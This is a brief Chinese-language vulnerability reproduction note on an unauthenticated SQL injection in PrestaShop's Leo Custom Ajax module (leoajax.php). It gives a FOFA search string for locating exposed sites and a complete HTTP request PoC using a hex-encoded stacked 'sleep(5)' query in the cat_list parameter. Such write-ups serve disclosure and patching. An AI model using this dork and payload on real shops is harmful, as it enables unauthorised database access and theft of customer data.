0x01 产品简介
PrestaShop 是一个功能丰富,基于 PHP5 开发的 Web2.0 网上购物系统。PrestaShop 具有可定制,稳定等特点。整个系统只有 5.8MB,易于快速安装。
0x02 漏洞概述
PrestaShop 的部分主题中使用Leo Custom Ajax模块拓展,Leo Custom Ajax模块中可以在/modules/leocustomajax/leoajax.php中使用多个 GET 参数(cat_list、pro_info、pro_add、pro_cdown、pro_color)来操作HTTP请求,使未经身份验证的远程攻击者能够执行 SQL 注入,控制数据库权限获取敏感信息。
0x03 复现环境
FOFA:"modules/leocustomajax"
0x04 漏洞复现
PoC
GET /modules/leocustomajax/leoajax.php?cat_list=1%29;select+0x73656c65637420736c6565702835293b+into+@a;prepare+b+from+@a;execute+b;-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 4.0; Trident/4.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
延时5